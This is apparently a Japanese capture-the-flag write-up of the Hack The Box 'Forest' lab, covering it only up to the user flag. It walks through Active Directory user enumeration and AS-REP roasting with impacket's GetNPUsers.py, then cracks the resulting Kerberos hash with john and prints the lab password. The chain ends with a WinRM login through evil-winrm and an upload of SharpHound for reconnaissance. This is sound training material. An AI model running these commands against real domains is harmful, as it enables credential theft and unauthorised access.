Hack The Box Writeup Forest(途中user.txtの取得まで)
■準備 HTBのサイトにログイン ovpnファイルをHTBのサイトからダウンロードしておく
VPNで接続
$ sudo openvpn lab_xxxxx1.ovpn (略) 2021-07-16 21:36:53 net_route_v4_add: 10.10.10.0/23 via 10.10.16.1 dev [NULL] table 0 metric -1 (略) 2021-07-16 22:01:20 Preserving previous TUN/TAP instance: tun0 2021-07-16 22:01:20 Initialization Sequence Completed
「Initialization Sequence Completed」で止まったらOK
別のターミナルを開いてコマンドを実行していく
■問題
Forest
https://app.hackthebox.eu/machines/Forest
参考
https://qiita.com/v_avenger/items/43014e5e34fe491764c8
■情報収集(NW)
$ nmap -sV -sT -sC 10.10.10.161 Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-17 03:29 EDT Nmap scan report for 10.10.10.161 Host is up (0.55s latency). Not shown: 989 closed ports PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-17 07:49:25Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h39m08s, deviation: 4h02m32s, median: 19m06s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: FOREST | NetBIOS computer name: FOREST\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: FOREST.htb.local |_ System time: 2021-07-17T00:49:50-07:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2021-07-17T07:49:48 |_ start_date: 2021-07-16T05:25:15 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 124.64 seconds
■情報収集
$ enum4linux 10.10.10.161 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jul 17 03:33:01 2021 (略) ============================= | Users on 10.10.10.161 | ============================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866. index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA Name: (null) Desc: (null) index: 0xfbc RID: 0x1f4 acb: 0x00020010 Account: Administrator Name: Administrator Desc: Built-in account for administering the computer/domain index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy Name: Andy Hislip Desc: (null) index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system. index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1 Name: HealthMailbox-EXCH01-010 Desc: (null) index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e Name: HealthMailbox-EXCH01-003 Desc: (null) index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678 Name: HealthMailbox-EXCH01-005 Desc: (null) index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e Name: HealthMailbox-EXCH01-009 Desc: (null) index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781 Name: HealthMailbox-EXCH01-006 Desc: (null) index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d Name: HealthMailbox-EXCH01-004 Desc: (null) index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64 Name: HealthMailbox-EXCH01-008 Desc: (null) index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9 Name: HealthMailbox-EXCH01-002 Desc: (null) index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722 Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013 Desc: (null) index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad Name: HealthMailbox-EXCH01-001 Desc: (null) index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238 Name: HealthMailbox-EXCH01-007 Desc: (null) index: 0xff4 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda Name: Lucinda Berger Desc: (null) index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark Name: Mark Brandt Desc: (null) index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi Name: Santi Rodriguez Desc: (null) index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien Name: Sebastien Caron Desc: (null) index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb Name: Microsoft Exchange Migration Desc: (null) index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9} Desc: (null) index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb Name: Microsoft Exchange Approval Assistant Desc: (null) index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18 Name: Discovery Search Mailbox Desc: (null) index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a Name: Microsoft Exchange Desc: (null) index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb Name: E4E Encryption Store - Active Desc: (null) index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549 Name: Microsoft Exchange Federation Mailbox Desc: (null) index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b Name: Microsoft Exchange Desc: (null) index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b Name: Microsoft Exchange Desc: (null) index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco Name: svc-alfresco Desc: (null) Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881. user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[$331000-VK4ADACQNUCA] rid:[0x463] user:[SM_2c8eef0a09b545acb] rid:[0x464] user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465] user:[SM_75a538d3025e4db9a] rid:[0x466] user:[SM_681f53d4942840e18] rid:[0x467] user:[SM_1b41c9286325456bb] rid:[0x468] user:[SM_9b69f1b9d2cc45549] rid:[0x469] user:[SM_7c96b981967141ebb] rid:[0x46a] user:[SM_c75ee099d0a64c91b] rid:[0x46b] user:[SM_1ffab36a2f5f479cb] rid:[0x46c] user:[HealthMailboxc3d7722] rid:[0x46e] user:[HealthMailboxfc9daad] rid:[0x46f] user:[HealthMailboxc0a90c9] rid:[0x470] user:[HealthMailbox670628e] rid:[0x471] user:[HealthMailbox968e74d] rid:[0x472] user:[HealthMailbox6ded678] rid:[0x473] user:[HealthMailbox83d6781] rid:[0x474] user:[HealthMailboxfd87238] rid:[0x475] user:[HealthMailboxb01ac64] rid:[0x476] user:[HealthMailbox7108a4e] rid:[0x477] user:[HealthMailbox0659cc1] rid:[0x478] user:[sebastien] rid:[0x479] user:[lucinda] rid:[0x47a] user:[svc-alfresco] rid:[0x47b] user:[andy] rid:[0x47e] user:[mark] rid:[0x47f] user:[santi] rid:[0x480] ========================================= (略)
ASREPRoast攻撃が有効らしい
https://book.hacktricks.xyz/windows/active-directory-methodology/asreproast
ASREPRoast攻撃は、Kerberosの事前認証必須属性(DONT_REQ_PREAUTH)を持たないユーザを探します。 つまり、誰もがそれらのユーザに代わってDCにAS_REQリクエストを送信し、 AS_REPメッセージを受け取ることができるということです。
ASREPRoast攻撃に使用するツール(GetNPUsers.py)をダウンロード
$ wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetNPUsers.py
試しに動かしてみるが、モジュール(impacket)がないらしく、動かない
$ python3 GetNPUsers.py --help
ModuleNotFoundError: No module named 'impacket.examples.utils'
$ pip --version
pip 20.3.4 from /usr/lib/python3/dist-packages/pip (python 3.9)
impacketは入っているらしいので、一度アンインストールする
→消すものがないらしい。この環境、大丈夫?
$ pip uninstall impacket
Found existing installation: impacket 0.9.22
Not uninstalling impacket at /usr/lib/python3/dist-packages, outside environment /usr
Can't uninstall 'impacket'. No files were found to uninstall.
必要なモジュール(impacket)をダウンロード
git clone https://github.com/CoreSecurity/impacket.git
cd impacket
vi setup.py #!/usr/bin/env python ↓ #!/usr/bin/env python3
impacketをインストール
$ sudo python3 setup.py install
$ python3 GetNPUsers.py --help Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
usage: GetNPUsers.py [-h] [-request] [-outputfile OUTPUTFILE] [-format {hashcat,john}] [-usersfile USERSFILE] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] target
ユーザー名が必要なので、enum4linuxの「 Users on 10.10.10.161 」の結果を保存
$ cat users_forest.txt
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
:
[と]を区切り文字として、ユーザ名を取り出す
$ cat users_forest.txt | cut -d "[" -f 2 | cut -d "]" -f 1 > usernames_forest.txt
$ cat usernames_forest.txt Administrator Guest :
ドメイン名を指定(Domain name: htb.local)
-usersfile ユーザー名一覧を指定
-format johnで解析できる形式で出力
-outputfile 結果を出力するファイル名(なんでもいい)
$ python3 GetNPUsers.py HTB.local/ -usersfile usernames_forest.txt -format john -outputfile output_forest.txt -no-pass -dc-ip 10.10.10.161 Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) (略) [-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set [-] invalid principal syntax
失敗かと思われたが、output_forest.txtに出力あり
$ cat output_forest.txt
$krb5asrep$svc-alfresco@HTB.LOCAL:d93839684eb654739ffa7(略)
ユーザ「svc-alfresco」のハッシュ値が取れているようだ
ハッシュ値をjohnコマンドで解析(辞書はrockyou.txt)
$ john output_forest.txt --wordlist=rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 512/512 AVX512BW 16x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status s3rvice ($krb5asrep$svc-alfresco@HTB.LOCAL) 1g 0:00:00:03 DONE (2021-07-26 16:33) 0.2770g/s 1131Kp/s 1131Kc/s 1131KC/s s521379846..s3r2s1 Use the "--show" option to display all of the cracked passwords reliably Session completed
判明したパスワードは「s3rvice」
資格情報が得られたので、WinRMで接続できるか確かめる
$ nmap -p 5985 10.10.10.161 PORT STATE SERVICE 5985/tcp open wsman Nmap done: 1 IP address (1 host up) scanned in 0.89 seconds
ポートは空いている
WS-Management (WSMan)≒WinRM という感じらしい
| クライアントPC
↓ WS-MAN(HTTP)
| リモートPC
| ↓
| WinRM
| ↓| PowerShell
接続に使うツールをインストール
$ sudo gem install winrm winrm-fs colorize stringio
$ git clone https://github.com/Hackplayers/evil-winrm.git cd evil-winrm
WinRMで接続
./evil-winrm.rb -i 10.10.10.161 -u svc-alfresco -p s3rvice Evil-WinRM shell v3.0 *Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
フラグを表示
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type C:\Users\svc-alfresco\Desktop\user.txt e5e*********************************ed
1つ目のフラグが取れた
Windows Active Directory環境の分析をBloodHoundというツールで行う
Active Directory環境の関係性がわかり、Domain Adminsを取る手掛かりとなる情報が得られるとのこと
ローカルにダウンロード
$ cd evil-winrm
$ wget https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1
攻略対象マシンにアップロードして、実行
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> upload SharpHound.ps1 Info: Upload successful! *Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Import-module ./SharpHound.ps1 *Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Invoke-BloodHound -CollectionMethod ACL,ObjectProps,Default -NoSaveCache ※-CompressData -RemoveCSVはエラーとなったので指定を外した *Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir Directory: C:\Users\svc-alfresco\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 7/26/2021 1:44 AM 15361 20210726014448_BloodHound.zip ★結果 -a---- 7/26/2021 1:41 AM 974235 SharpHound.ps1 -ar--- 9/23/2019 2:16 PM 32 user.txt
結果ファイルをダウンロード
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> download 20210726014448_BloodHound.zip Info: Download successful!
「Download successful!」だが、なぜかローカルにダウンロードされていない・・・
ツールの不具合なのか?
いったんここまで